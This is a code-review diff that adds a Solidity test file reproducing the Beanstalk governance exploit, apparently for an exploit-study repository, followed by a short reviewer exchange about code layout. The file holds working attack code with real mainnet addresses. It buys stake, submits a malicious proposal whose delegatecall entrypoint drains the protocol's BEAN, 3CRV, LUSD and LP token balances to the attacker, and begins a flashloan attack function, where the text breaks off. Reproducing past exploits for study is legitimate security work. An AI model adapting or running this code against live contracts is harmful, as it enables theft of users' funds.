test/Business_Logic/Beanstalk/Beanstalk_attack.sol

```diff
@@ -0,0 +1,195 @@
+    IUniswapV2Router02 private constant uniswap = IUniswapV2Router02(payable(0x7a250d5630B4cF539739dF2C5dAcb4c659F2488D));
+    IUniswapV2Factory private constant factory = IUniswapV2Factory(0x5C69bEe701ef814a2B6a3EDD4B1652CB9cc5aA6f);
+    IERC20 private constant weth = IERC20(0xC02aaA39b223FE8D0A0e5C4F27eAD9083C756Cc2); 
+    ICurvePool private constant crvbean = ICurvePool(0x3a70DfA7d2262988064A2D051dd47521E43c9BdD);
+    IERC20 private constant crv = IERC20(0x6c3F90f043a72FA612cbac8115EE7e52BDe6E490);
+    ICurvePool private constant crvpool = ICurvePool(0xbEbc44782C7dB0a1A60Cb6fe97d0b483032FF1C7);
+
+    function propose() external payable {
+        // proposing the bip requires a stake
+        // this money must be owned when preparing the attack
+        bean.approve(address(beanstalk), type(uint256).max);
+        
+        address[] memory path = new address[](2);
+        path[0] = uniswap.WETH();
+        path[1] = address(bean);  //we need bean tokens
+        uniswap.swapExactETHForTokens{value: 100 ether}(0, path, address(this), block.timestamp + 1);
+        
+        //depositing into bean
+        beanstalk.depositBeans(bean.balanceOf(address(this)));
+
+        //the proposal is just calling the entrypoint function at this contract address
+        //this will be performed using a delegate call from the beanstalk silo
+        IBeanStalk.FacetCut[] memory cut = new IBeanStalk.FacetCut[](0);
+        bytes memory data = abi.encodeWithSelector(Beanstattack.entrypoint.selector);
+        beanstalk.propose(cut, address(this), data, 3);
+    }
+    
+    function entrypoint() external {
+        //Don't use storage here as this is called though delegateCall
+        //Here we have msg.sender as the attacker and this as the victim
+        address token = 0x3a70DfA7d2262988064A2D051dd47521E43c9BdD; //BEAN 3CRV
+        IERC20(token).transfer(msg.sender, IERC20(token).balanceOf(address(this)));
+
+        token = 0xD652c40fBb3f06d6B58Cb9aa9CFF063eE63d465D; //BEANLUSD
+        IERC20(token).transfer(msg.sender, IERC20(token).balanceOf(address(this)));
+
+        token = 0xDC59ac4FeFa32293A95889Dc396682858d52e5Db; //BEAN
+        IERC20(token).transfer(msg.sender, IERC20(token).balanceOf(address(this)));
+
+        token = 0x87898263B6C5BABe34b4ec53F22d98430b91e371; //UNI-BEAN
+        IERC20(token).transfer(msg.sender, IERC20(token).balanceOf(address(this)));
+    }
+
+    function attack() external {
+        //Approvals
+        //we need to deposit in crv liquidity pool and also approve aave so it can recover the funds
+        //after the flashloan
+        //approvals could be performed later, but there's no real benefit on it
+        address[] memory addresses = new address[](2);
+        addresses[0] = address(crvpool);
+        addresses[1] = address(aave);
+
+        address[] memory tokens = new address[](3);
+        tokens[0] = address(0x6B175474E89094C44Da98b954EedeAC495271d0F); //DAI
```

Comment:
Maybe we could  re-arrange token addresses and any other relevant parameter as global variables for this exploit.

Reply:
I think that this highlights the importance of the order when calling add_liquidity which could be interesting for readers.